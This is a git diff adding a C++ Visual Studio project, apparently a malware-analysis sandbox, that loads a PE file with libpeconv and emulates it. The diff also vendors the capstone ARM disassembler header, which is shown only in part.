diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 0000000..34c22c9 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,60 @@ +{ + "files.associations": { + "iostream": "cpp", + "xstring": "cpp", + "algorithm": "cpp", + "atomic": "cpp", + "bit": "cpp", + "cctype": "cpp", + "clocale": "cpp", + "cmath": "cpp", + "compare": "cpp", + "concepts": "cpp", + "cstddef": "cpp", + "cstdint": "cpp", + "cstdio": "cpp", + "cstdlib": "cpp", + "cstring": "cpp", + "ctime": "cpp", + "cwchar": "cpp", + "exception": "cpp", + "fstream": "cpp", + "initializer_list": "cpp", + "iomanip": "cpp", + "ios": "cpp", + "iosfwd": "cpp", + "istream": "cpp", + "iterator": "cpp", + "limits": "cpp", + "list": "cpp", + "map": "cpp", + "memory": "cpp", + "new": "cpp", + "ostream": "cpp", + "set": "cpp", + "sstream": "cpp", + "stdexcept": "cpp", + "streambuf": "cpp", + "string": "cpp", + "system_error": "cpp", + "tuple": "cpp", + "type_traits": "cpp", + "typeinfo": "cpp", + "unordered_map": "cpp", + "utility": "cpp", + "vector": "cpp", + "xfacet": "cpp", + "xhash": "cpp", + "xiosbase": "cpp", + "xlocale": "cpp", + "xlocinfo": "cpp", + "xlocmon": "cpp", + "xlocnum": "cpp", + "xloctime": "cpp", + "xmemory": "cpp", + "xstddef": "cpp", + "xtr1common": "cpp", + "xtree": "cpp", + "xutility": "cpp" + } +} \ No newline at end of file diff --git a/ai_anti_malware.sln b/ai_anti_malware.sln new file mode 100644 index 0000000..4e9a213 --- /dev/null +++ b/ai_anti_malware.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.35731.53 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ai_anti_malware", "ai_anti_malware\ai_anti_malware.vcxproj", "{E12C93D6-6150-484D-85E1-7A644E393D5A}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 
= Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Debug|x64.ActiveCfg = Debug|x64 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Debug|x64.Build.0 = Debug|x64 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Debug|x86.ActiveCfg = Debug|Win32 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Debug|x86.Build.0 = Debug|Win32 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Release|x64.ActiveCfg = Release|x64 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Release|x64.Build.0 = Release|x64 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Release|x86.ActiveCfg = Release|Win32 + {E12C93D6-6150-484D-85E1-7A644E393D5A}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {4B304E25-0491-4346-8FCB-7E30DDEB2E43} + EndGlobalSection +EndGlobal diff --git a/ai_anti_malware/ai_anti_malware.cpp b/ai_anti_malware/ai_anti_malware.cpp new file mode 100644 index 0000000..4744838 --- /dev/null +++ b/ai_anti_malware/ai_anti_malware.cpp @@ -0,0 +1,48 @@ +// ai_anti_malware.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 +// + +#include "head.h" + +auto getPeInfo(std::string inputFilePath) -> std::shared_ptr { + auto sampleInfo = std::make_shared(); + sampleInfo->inputFilePath = + "E:\\对战平台\\CrowAntiCheat\\CrowAntiCheat\\client\\Console_" + "Test\\Release\\Console_Test.exe"; + + sampleInfo->peBuffer = + peconv::load_pe_module((const char*)sampleInfo->inputFilePath.c_str(), + sampleInfo->peSize, false, false); + sampleInfo->ntHead64 = peconv::get_nt_hdrs64((BYTE*)sampleInfo->peBuffer); + sampleInfo->ntHead32 = peconv::get_nt_hdrs32((BYTE*)sampleInfo->peBuffer); + sampleInfo->isX64 = peconv::is64bit((BYTE*)sampleInfo->peBuffer); + sampleInfo->RecImageBase = + sampleInfo->isX64 + ? 
(DWORD64)sampleInfo->ntHead64->OptionalHeader.ImageBase + : (DWORD)sampleInfo->ntHead32->OptionalHeader.ImageBase; + sampleInfo->isRelocated = peconv::relocate_module( + (BYTE*)sampleInfo->peBuffer, sampleInfo->peSize, sampleInfo->RecImageBase); + + sampleInfo->entryPoint = + sampleInfo->isX64 + ? sampleInfo->ntHead64->OptionalHeader.AddressOfEntryPoint + : sampleInfo->ntHead32->OptionalHeader.AddressOfEntryPoint; + sampleInfo->imageEnd = + sampleInfo->RecImageBase + + (sampleInfo->isX64 ? sampleInfo->ntHead64->OptionalHeader.SizeOfImage + : sampleInfo->ntHead32->OptionalHeader.SizeOfImage); + return sampleInfo; +} +int main() { + auto sampleInfo = getPeInfo( + "E:\\对战平台\\CrowAntiCheat\\CrowAntiCheat\\client\\Console_" + "Test\\Release\\Console_Test.exe"); + printf("input new file %s \n", sampleInfo->inputFilePath); + printf("is x64: %d\n", sampleInfo->isX64); + printf("is relocated: %d\n", sampleInfo->isRelocated); + printf("RecImageBase: %llx\n", sampleInfo->RecImageBase); + auto sandbox = std::make_shared(); + sandbox->InitEnv(sampleInfo); + sandbox->Run(); + system("pause"); + return 0; +} diff --git a/ai_anti_malware/ai_anti_malware.vcxproj b/ai_anti_malware/ai_anti_malware.vcxproj new file mode 100644 index 0000000..d59176d --- /dev/null +++ b/ai_anti_malware/ai_anti_malware.vcxproj @@ -0,0 +1,187 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {e12c93d6-6150-484d-85e1-7a644e393d5a} + aiantimalware + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + $(SolutionDir)ai_anti_malware\libpeconv\libpeconv\;$(SolutionDir)ai_anti_malware\libpeconv\libpeconv\include;$(SolutionDir)ai_anti_malware\libpeconv\;$(IncludePath) + + + false + + + + Level3 + true + 
WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + stdcpplatest + false + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/ai_anti_malware/ai_anti_malware.vcxproj.filters b/ai_anti_malware/ai_anti_malware.vcxproj.filters new file mode 100644 index 0000000..fe53946 --- /dev/null +++ b/ai_anti_malware/ai_anti_malware.vcxproj.filters @@ -0,0 +1,138 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {9204f3c4-f3df-47b3-9cfc-42fcc5dd6ca9} + + + {41d9dd76-a1a6-4627-b982-cbdb41cf0f7b} + + + {38ea362d-55dc-410e-92f1-3a44ced4dc2d} + + + + + 源文件 + + + 源文件\sandbox + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 头文件\libpe + + + 源文件\sandbox + + + + + 头文件 + + + 头文件\sandbox + + + 头文件\libpe + + + 头文件\libpe + + + 头文件 + + + 头文件\sandbox + + + \ No newline at end of file diff --git a/ai_anti_malware/capstone/capstone.lib b/ai_anti_malware/capstone/capstone.lib new file mode 100644 index 
0000000..01bfdde Binary files /dev/null and b/ai_anti_malware/capstone/capstone.lib differ diff --git a/ai_anti_malware/capstone/include/capstone/arm.h b/ai_anti_malware/capstone/include/capstone/arm.h new file mode 100644 index 0000000..21ba5be --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/arm.h @@ -0,0 +1,937 @@ +#ifndef CAPSTONE_ARM_H +#define CAPSTONE_ARM_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// ARM shift type +typedef enum arm_shifter { + ARM_SFT_INVALID = 0, + ARM_SFT_ASR, ///< shift with immediate const + ARM_SFT_LSL, ///< shift with immediate const + ARM_SFT_LSR, ///< shift with immediate const + ARM_SFT_ROR, ///< shift with immediate const + ARM_SFT_RRX, ///< shift with immediate const + ARM_SFT_ASR_REG, ///< shift with register + ARM_SFT_LSL_REG, ///< shift with register + ARM_SFT_LSR_REG, ///< shift with register + ARM_SFT_ROR_REG, ///< shift with register + ARM_SFT_RRX_REG, ///< shift with register +} arm_shifter; + +/// ARM condition code +typedef enum arm_cc { + ARM_CC_INVALID = 0, + ARM_CC_EQ, ///< Equal Equal + ARM_CC_NE, ///< Not equal Not equal, or unordered + ARM_CC_HS, ///< Carry set >, ==, or unordered + ARM_CC_LO, ///< Carry clear Less than + ARM_CC_MI, ///< Minus, negative Less than + ARM_CC_PL, ///< Plus, positive or zero >, ==, or unordered + ARM_CC_VS, ///< Overflow Unordered + ARM_CC_VC, ///< No overflow Not unordered + ARM_CC_HI, ///< Unsigned higher Greater than, or unordered + ARM_CC_LS, ///< Unsigned lower or same Less than or equal + ARM_CC_GE, ///< Greater than or equal Greater than or equal + ARM_CC_LT, ///< Less than Less than, or unordered + ARM_CC_GT, ///< Greater than Greater than + ARM_CC_LE, ///< Less than or equal <, ==, or unordered + ARM_CC_AL ///< Always (unconditional) Always (unconditional) +} arm_cc; + +typedef enum arm_sysreg { + /// 
Special registers for MSR + ARM_SYSREG_INVALID = 0, + + // SPSR* registers can be OR combined + ARM_SYSREG_SPSR_C = 1, + ARM_SYSREG_SPSR_X = 2, + ARM_SYSREG_SPSR_S = 4, + ARM_SYSREG_SPSR_F = 8, + + // CPSR* registers can be OR combined + ARM_SYSREG_CPSR_C = 16, + ARM_SYSREG_CPSR_X = 32, + ARM_SYSREG_CPSR_S = 64, + ARM_SYSREG_CPSR_F = 128, + + // independent registers + ARM_SYSREG_APSR = 256, + ARM_SYSREG_APSR_G, + ARM_SYSREG_APSR_NZCVQ, + ARM_SYSREG_APSR_NZCVQG, + + ARM_SYSREG_IAPSR, + ARM_SYSREG_IAPSR_G, + ARM_SYSREG_IAPSR_NZCVQG, + ARM_SYSREG_IAPSR_NZCVQ, + + ARM_SYSREG_EAPSR, + ARM_SYSREG_EAPSR_G, + ARM_SYSREG_EAPSR_NZCVQG, + ARM_SYSREG_EAPSR_NZCVQ, + + ARM_SYSREG_XPSR, + ARM_SYSREG_XPSR_G, + ARM_SYSREG_XPSR_NZCVQG, + ARM_SYSREG_XPSR_NZCVQ, + + ARM_SYSREG_IPSR, + ARM_SYSREG_EPSR, + ARM_SYSREG_IEPSR, + + ARM_SYSREG_MSP, + ARM_SYSREG_PSP, + ARM_SYSREG_PRIMASK, + ARM_SYSREG_BASEPRI, + ARM_SYSREG_BASEPRI_MAX, + ARM_SYSREG_FAULTMASK, + ARM_SYSREG_CONTROL, + + // Banked Registers + ARM_SYSREG_R8_USR, + ARM_SYSREG_R9_USR, + ARM_SYSREG_R10_USR, + ARM_SYSREG_R11_USR, + ARM_SYSREG_R12_USR, + ARM_SYSREG_SP_USR, + ARM_SYSREG_LR_USR, + ARM_SYSREG_R8_FIQ, + ARM_SYSREG_R9_FIQ, + ARM_SYSREG_R10_FIQ, + ARM_SYSREG_R11_FIQ, + ARM_SYSREG_R12_FIQ, + ARM_SYSREG_SP_FIQ, + ARM_SYSREG_LR_FIQ, + ARM_SYSREG_LR_IRQ, + ARM_SYSREG_SP_IRQ, + ARM_SYSREG_LR_SVC, + ARM_SYSREG_SP_SVC, + ARM_SYSREG_LR_ABT, + ARM_SYSREG_SP_ABT, + ARM_SYSREG_LR_UND, + ARM_SYSREG_SP_UND, + ARM_SYSREG_LR_MON, + ARM_SYSREG_SP_MON, + ARM_SYSREG_ELR_HYP, + ARM_SYSREG_SP_HYP, + + ARM_SYSREG_SPSR_FIQ, + ARM_SYSREG_SPSR_IRQ, + ARM_SYSREG_SPSR_SVC, + ARM_SYSREG_SPSR_ABT, + ARM_SYSREG_SPSR_UND, + ARM_SYSREG_SPSR_MON, + ARM_SYSREG_SPSR_HYP, +} arm_sysreg; + +/// The memory barrier constants map directly to the 4-bit encoding of +/// the option field for Memory Barrier operations. 
+typedef enum arm_mem_barrier { + ARM_MB_INVALID = 0, + ARM_MB_RESERVED_0, + ARM_MB_OSHLD, + ARM_MB_OSHST, + ARM_MB_OSH, + ARM_MB_RESERVED_4, + ARM_MB_NSHLD, + ARM_MB_NSHST, + ARM_MB_NSH, + ARM_MB_RESERVED_8, + ARM_MB_ISHLD, + ARM_MB_ISHST, + ARM_MB_ISH, + ARM_MB_RESERVED_12, + ARM_MB_LD, + ARM_MB_ST, + ARM_MB_SY, +} arm_mem_barrier; + +/// Operand type for instruction's operands +typedef enum arm_op_type { + ARM_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + ARM_OP_REG, ///< = CS_OP_REG (Register operand). + ARM_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + ARM_OP_MEM, ///< = CS_OP_MEM (Memory operand). + ARM_OP_FP, ///< = CS_OP_FP (Floating-Point operand). + ARM_OP_CIMM = 64, ///< C-Immediate (coprocessor registers) + ARM_OP_PIMM, ///< P-Immediate (coprocessor registers) + ARM_OP_SETEND, ///< operand for SETEND instruction + ARM_OP_SYSREG, ///< MSR/MRS special register operand +} arm_op_type; + +/// Operand type for SETEND instruction +typedef enum arm_setend_type { + ARM_SETEND_INVALID = 0, ///< Uninitialized. + ARM_SETEND_BE, ///< BE operand. + ARM_SETEND_LE, ///< LE operand +} arm_setend_type; + +typedef enum arm_cpsmode_type { + ARM_CPSMODE_INVALID = 0, + ARM_CPSMODE_IE = 2, + ARM_CPSMODE_ID = 3 +} arm_cpsmode_type; + +/// Operand type for SETEND instruction +typedef enum arm_cpsflag_type { + ARM_CPSFLAG_INVALID = 0, + ARM_CPSFLAG_F = 1, + ARM_CPSFLAG_I = 2, + ARM_CPSFLAG_A = 4, + ARM_CPSFLAG_NONE = 16, ///< no flag +} arm_cpsflag_type; + +/// Data type for elements of vector instructions. 
+typedef enum arm_vectordata_type { + ARM_VECTORDATA_INVALID = 0, + + // Integer type + ARM_VECTORDATA_I8, + ARM_VECTORDATA_I16, + ARM_VECTORDATA_I32, + ARM_VECTORDATA_I64, + + // Signed integer type + ARM_VECTORDATA_S8, + ARM_VECTORDATA_S16, + ARM_VECTORDATA_S32, + ARM_VECTORDATA_S64, + + // Unsigned integer type + ARM_VECTORDATA_U8, + ARM_VECTORDATA_U16, + ARM_VECTORDATA_U32, + ARM_VECTORDATA_U64, + + // Data type for VMUL/VMULL + ARM_VECTORDATA_P8, + + // Floating type + ARM_VECTORDATA_F32, + ARM_VECTORDATA_F64, + + // Convert float <-> float + ARM_VECTORDATA_F16F64, // f16.f64 + ARM_VECTORDATA_F64F16, // f64.f16 + ARM_VECTORDATA_F32F16, // f32.f16 + ARM_VECTORDATA_F16F32, // f32.f16 + ARM_VECTORDATA_F64F32, // f64.f32 + ARM_VECTORDATA_F32F64, // f32.f64 + + // Convert integer <-> float + ARM_VECTORDATA_S32F32, // s32.f32 + ARM_VECTORDATA_U32F32, // u32.f32 + ARM_VECTORDATA_F32S32, // f32.s32 + ARM_VECTORDATA_F32U32, // f32.u32 + ARM_VECTORDATA_F64S16, // f64.s16 + ARM_VECTORDATA_F32S16, // f32.s16 + ARM_VECTORDATA_F64S32, // f64.s32 + ARM_VECTORDATA_S16F64, // s16.f64 + ARM_VECTORDATA_S16F32, // s16.f64 + ARM_VECTORDATA_S32F64, // s32.f64 + ARM_VECTORDATA_U16F64, // u16.f64 + ARM_VECTORDATA_U16F32, // u16.f32 + ARM_VECTORDATA_U32F64, // u32.f64 + ARM_VECTORDATA_F64U16, // f64.u16 + ARM_VECTORDATA_F32U16, // f32.u16 + ARM_VECTORDATA_F64U32, // f64.u32 +} arm_vectordata_type; + +/// ARM registers +typedef enum arm_reg { + ARM_REG_INVALID = 0, + ARM_REG_APSR, + ARM_REG_APSR_NZCV, + ARM_REG_CPSR, + ARM_REG_FPEXC, + ARM_REG_FPINST, + ARM_REG_FPSCR, + ARM_REG_FPSCR_NZCV, + ARM_REG_FPSID, + ARM_REG_ITSTATE, + ARM_REG_LR, + ARM_REG_PC, + ARM_REG_SP, + ARM_REG_SPSR, + ARM_REG_D0, + ARM_REG_D1, + ARM_REG_D2, + ARM_REG_D3, + ARM_REG_D4, + ARM_REG_D5, + ARM_REG_D6, + ARM_REG_D7, + ARM_REG_D8, + ARM_REG_D9, + ARM_REG_D10, + ARM_REG_D11, + ARM_REG_D12, + ARM_REG_D13, + ARM_REG_D14, + ARM_REG_D15, + ARM_REG_D16, + ARM_REG_D17, + ARM_REG_D18, + ARM_REG_D19, + ARM_REG_D20, + 
ARM_REG_D21, + ARM_REG_D22, + ARM_REG_D23, + ARM_REG_D24, + ARM_REG_D25, + ARM_REG_D26, + ARM_REG_D27, + ARM_REG_D28, + ARM_REG_D29, + ARM_REG_D30, + ARM_REG_D31, + ARM_REG_FPINST2, + ARM_REG_MVFR0, + ARM_REG_MVFR1, + ARM_REG_MVFR2, + ARM_REG_Q0, + ARM_REG_Q1, + ARM_REG_Q2, + ARM_REG_Q3, + ARM_REG_Q4, + ARM_REG_Q5, + ARM_REG_Q6, + ARM_REG_Q7, + ARM_REG_Q8, + ARM_REG_Q9, + ARM_REG_Q10, + ARM_REG_Q11, + ARM_REG_Q12, + ARM_REG_Q13, + ARM_REG_Q14, + ARM_REG_Q15, + ARM_REG_R0, + ARM_REG_R1, + ARM_REG_R2, + ARM_REG_R3, + ARM_REG_R4, + ARM_REG_R5, + ARM_REG_R6, + ARM_REG_R7, + ARM_REG_R8, + ARM_REG_R9, + ARM_REG_R10, + ARM_REG_R11, + ARM_REG_R12, + ARM_REG_S0, + ARM_REG_S1, + ARM_REG_S2, + ARM_REG_S3, + ARM_REG_S4, + ARM_REG_S5, + ARM_REG_S6, + ARM_REG_S7, + ARM_REG_S8, + ARM_REG_S9, + ARM_REG_S10, + ARM_REG_S11, + ARM_REG_S12, + ARM_REG_S13, + ARM_REG_S14, + ARM_REG_S15, + ARM_REG_S16, + ARM_REG_S17, + ARM_REG_S18, + ARM_REG_S19, + ARM_REG_S20, + ARM_REG_S21, + ARM_REG_S22, + ARM_REG_S23, + ARM_REG_S24, + ARM_REG_S25, + ARM_REG_S26, + ARM_REG_S27, + ARM_REG_S28, + ARM_REG_S29, + ARM_REG_S30, + ARM_REG_S31, + + ARM_REG_ENDING, // <-- mark the end of the list or registers + + // alias registers + ARM_REG_R13 = ARM_REG_SP, + ARM_REG_R14 = ARM_REG_LR, + ARM_REG_R15 = ARM_REG_PC, + + ARM_REG_SB = ARM_REG_R9, + ARM_REG_SL = ARM_REG_R10, + ARM_REG_FP = ARM_REG_R11, + ARM_REG_IP = ARM_REG_R12, +} arm_reg; + +/// Instruction's operand referring to memory +/// This is associated with ARM_OP_MEM operand type above +typedef struct arm_op_mem { + arm_reg base; ///< base register + arm_reg index; ///< index register + int scale; ///< scale for index register (can be 1, or -1) + int disp; ///< displacement/offset value + /// left-shift on index register, or 0 if irrelevant + /// NOTE: this value can also be fetched via operand.shift.value + int lshift; +} arm_op_mem; + +/// Instruction operand +typedef struct cs_arm_op { + int vector_index; ///< Vector Index for some vector operands 
(or -1 if irrelevant) + + struct { + arm_shifter type; + unsigned int value; + } shift; + + arm_op_type type; ///< operand type + + union { + int reg; ///< register value for REG/SYSREG operand + int32_t imm; ///< immediate value for C-IMM, P-IMM or IMM operand + double fp; ///< floating point value for FP operand + arm_op_mem mem; ///< base/index/scale/disp value for MEM operand + arm_setend_type setend; ///< SETEND instruction's operand type + }; + + /// in some instructions, an operand can be subtracted or added to + /// the base register, + /// if TRUE, this operand is subtracted. otherwise, it is added. + bool subtracted; + + /// How is this operand accessed? (READ, WRITE or READ|WRITE) + /// This field is combined of cs_ac_type. + /// NOTE: this field is irrelevant if engine is compiled in DIET mode. + uint8_t access; + + /// Neon lane index for NEON instructions (or -1 if irrelevant) + int8_t neon_lane; +} cs_arm_op; + +/// Instruction structure +typedef struct cs_arm { + bool usermode; ///< User-mode registers to be loaded (for LDM/STM instructions) + int vector_size; ///< Scalar size for vector instructions + arm_vectordata_type vector_data; ///< Data type for elements of vector instructions + arm_cpsmode_type cps_mode; ///< CPS mode for CPS instruction + arm_cpsflag_type cps_flag; ///< CPS mode for CPS instruction + arm_cc cc; ///< conditional code for this insn + bool update_flags; ///< does this insn update flags? + bool writeback; ///< does this insn write-back? + arm_mem_barrier mem_barrier; ///< Option for some memory barrier instructions + + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + + cs_arm_op operands[36]; ///< operands for this instruction. 
+} cs_arm; + +/// ARM instruction +typedef enum arm_insn { + ARM_INS_INVALID = 0, + + ARM_INS_ADC, + ARM_INS_ADD, + ARM_INS_ADR, + ARM_INS_AESD, + ARM_INS_AESE, + ARM_INS_AESIMC, + ARM_INS_AESMC, + ARM_INS_AND, + ARM_INS_BFC, + ARM_INS_BFI, + ARM_INS_BIC, + ARM_INS_BKPT, + ARM_INS_BL, + ARM_INS_BLX, + ARM_INS_BX, + ARM_INS_BXJ, + ARM_INS_B, + ARM_INS_CDP, + ARM_INS_CDP2, + ARM_INS_CLREX, + ARM_INS_CLZ, + ARM_INS_CMN, + ARM_INS_CMP, + ARM_INS_CPS, + ARM_INS_CRC32B, + ARM_INS_CRC32CB, + ARM_INS_CRC32CH, + ARM_INS_CRC32CW, + ARM_INS_CRC32H, + ARM_INS_CRC32W, + ARM_INS_DBG, + ARM_INS_DMB, + ARM_INS_DSB, + ARM_INS_EOR, + ARM_INS_ERET, + ARM_INS_VMOV, + ARM_INS_FLDMDBX, + ARM_INS_FLDMIAX, + ARM_INS_VMRS, + ARM_INS_FSTMDBX, + ARM_INS_FSTMIAX, + ARM_INS_HINT, + ARM_INS_HLT, + ARM_INS_HVC, + ARM_INS_ISB, + ARM_INS_LDA, + ARM_INS_LDAB, + ARM_INS_LDAEX, + ARM_INS_LDAEXB, + ARM_INS_LDAEXD, + ARM_INS_LDAEXH, + ARM_INS_LDAH, + ARM_INS_LDC2L, + ARM_INS_LDC2, + ARM_INS_LDCL, + ARM_INS_LDC, + ARM_INS_LDMDA, + ARM_INS_LDMDB, + ARM_INS_LDM, + ARM_INS_LDMIB, + ARM_INS_LDRBT, + ARM_INS_LDRB, + ARM_INS_LDRD, + ARM_INS_LDREX, + ARM_INS_LDREXB, + ARM_INS_LDREXD, + ARM_INS_LDREXH, + ARM_INS_LDRH, + ARM_INS_LDRHT, + ARM_INS_LDRSB, + ARM_INS_LDRSBT, + ARM_INS_LDRSH, + ARM_INS_LDRSHT, + ARM_INS_LDRT, + ARM_INS_LDR, + ARM_INS_MCR, + ARM_INS_MCR2, + ARM_INS_MCRR, + ARM_INS_MCRR2, + ARM_INS_MLA, + ARM_INS_MLS, + ARM_INS_MOV, + ARM_INS_MOVT, + ARM_INS_MOVW, + ARM_INS_MRC, + ARM_INS_MRC2, + ARM_INS_MRRC, + ARM_INS_MRRC2, + ARM_INS_MRS, + ARM_INS_MSR, + ARM_INS_MUL, + ARM_INS_MVN, + ARM_INS_ORR, + ARM_INS_PKHBT, + ARM_INS_PKHTB, + ARM_INS_PLDW, + ARM_INS_PLD, + ARM_INS_PLI, + ARM_INS_QADD, + ARM_INS_QADD16, + ARM_INS_QADD8, + ARM_INS_QASX, + ARM_INS_QDADD, + ARM_INS_QDSUB, + ARM_INS_QSAX, + ARM_INS_QSUB, + ARM_INS_QSUB16, + ARM_INS_QSUB8, + ARM_INS_RBIT, + ARM_INS_REV, + ARM_INS_REV16, + ARM_INS_REVSH, + ARM_INS_RFEDA, + ARM_INS_RFEDB, + ARM_INS_RFEIA, + ARM_INS_RFEIB, + ARM_INS_RSB, + ARM_INS_RSC, 
+ ARM_INS_SADD16, + ARM_INS_SADD8, + ARM_INS_SASX, + ARM_INS_SBC, + ARM_INS_SBFX, + ARM_INS_SDIV, + ARM_INS_SEL, + ARM_INS_SETEND, + ARM_INS_SHA1C, + ARM_INS_SHA1H, + ARM_INS_SHA1M, + ARM_INS_SHA1P, + ARM_INS_SHA1SU0, + ARM_INS_SHA1SU1, + ARM_INS_SHA256H, + ARM_INS_SHA256H2, + ARM_INS_SHA256SU0, + ARM_INS_SHA256SU1, + ARM_INS_SHADD16, + ARM_INS_SHADD8, + ARM_INS_SHASX, + ARM_INS_SHSAX, + ARM_INS_SHSUB16, + ARM_INS_SHSUB8, + ARM_INS_SMC, + ARM_INS_SMLABB, + ARM_INS_SMLABT, + ARM_INS_SMLAD, + ARM_INS_SMLADX, + ARM_INS_SMLAL, + ARM_INS_SMLALBB, + ARM_INS_SMLALBT, + ARM_INS_SMLALD, + ARM_INS_SMLALDX, + ARM_INS_SMLALTB, + ARM_INS_SMLALTT, + ARM_INS_SMLATB, + ARM_INS_SMLATT, + ARM_INS_SMLAWB, + ARM_INS_SMLAWT, + ARM_INS_SMLSD, + ARM_INS_SMLSDX, + ARM_INS_SMLSLD, + ARM_INS_SMLSLDX, + ARM_INS_SMMLA, + ARM_INS_SMMLAR, + ARM_INS_SMMLS, + ARM_INS_SMMLSR, + ARM_INS_SMMUL, + ARM_INS_SMMULR, + ARM_INS_SMUAD, + ARM_INS_SMUADX, + ARM_INS_SMULBB, + ARM_INS_SMULBT, + ARM_INS_SMULL, + ARM_INS_SMULTB, + ARM_INS_SMULTT, + ARM_INS_SMULWB, + ARM_INS_SMULWT, + ARM_INS_SMUSD, + ARM_INS_SMUSDX, + ARM_INS_SRSDA, + ARM_INS_SRSDB, + ARM_INS_SRSIA, + ARM_INS_SRSIB, + ARM_INS_SSAT, + ARM_INS_SSAT16, + ARM_INS_SSAX, + ARM_INS_SSUB16, + ARM_INS_SSUB8, + ARM_INS_STC2L, + ARM_INS_STC2, + ARM_INS_STCL, + ARM_INS_STC, + ARM_INS_STL, + ARM_INS_STLB, + ARM_INS_STLEX, + ARM_INS_STLEXB, + ARM_INS_STLEXD, + ARM_INS_STLEXH, + ARM_INS_STLH, + ARM_INS_STMDA, + ARM_INS_STMDB, + ARM_INS_STM, + ARM_INS_STMIB, + ARM_INS_STRBT, + ARM_INS_STRB, + ARM_INS_STRD, + ARM_INS_STREX, + ARM_INS_STREXB, + ARM_INS_STREXD, + ARM_INS_STREXH, + ARM_INS_STRH, + ARM_INS_STRHT, + ARM_INS_STRT, + ARM_INS_STR, + ARM_INS_SUB, + ARM_INS_SVC, + ARM_INS_SWP, + ARM_INS_SWPB, + ARM_INS_SXTAB, + ARM_INS_SXTAB16, + ARM_INS_SXTAH, + ARM_INS_SXTB, + ARM_INS_SXTB16, + ARM_INS_SXTH, + ARM_INS_TEQ, + ARM_INS_TRAP, + ARM_INS_TST, + ARM_INS_UADD16, + ARM_INS_UADD8, + ARM_INS_UASX, + ARM_INS_UBFX, + ARM_INS_UDF, + ARM_INS_UDIV, + ARM_INS_UHADD16, + 
ARM_INS_UHADD8, + ARM_INS_UHASX, + ARM_INS_UHSAX, + ARM_INS_UHSUB16, + ARM_INS_UHSUB8, + ARM_INS_UMAAL, + ARM_INS_UMLAL, + ARM_INS_UMULL, + ARM_INS_UQADD16, + ARM_INS_UQADD8, + ARM_INS_UQASX, + ARM_INS_UQSAX, + ARM_INS_UQSUB16, + ARM_INS_UQSUB8, + ARM_INS_USAD8, + ARM_INS_USADA8, + ARM_INS_USAT, + ARM_INS_USAT16, + ARM_INS_USAX, + ARM_INS_USUB16, + ARM_INS_USUB8, + ARM_INS_UXTAB, + ARM_INS_UXTAB16, + ARM_INS_UXTAH, + ARM_INS_UXTB, + ARM_INS_UXTB16, + ARM_INS_UXTH, + ARM_INS_VABAL, + ARM_INS_VABA, + ARM_INS_VABDL, + ARM_INS_VABD, + ARM_INS_VABS, + ARM_INS_VACGE, + ARM_INS_VACGT, + ARM_INS_VADD, + ARM_INS_VADDHN, + ARM_INS_VADDL, + ARM_INS_VADDW, + ARM_INS_VAND, + ARM_INS_VBIC, + ARM_INS_VBIF, + ARM_INS_VBIT, + ARM_INS_VBSL, + ARM_INS_VCEQ, + ARM_INS_VCGE, + ARM_INS_VCGT, + 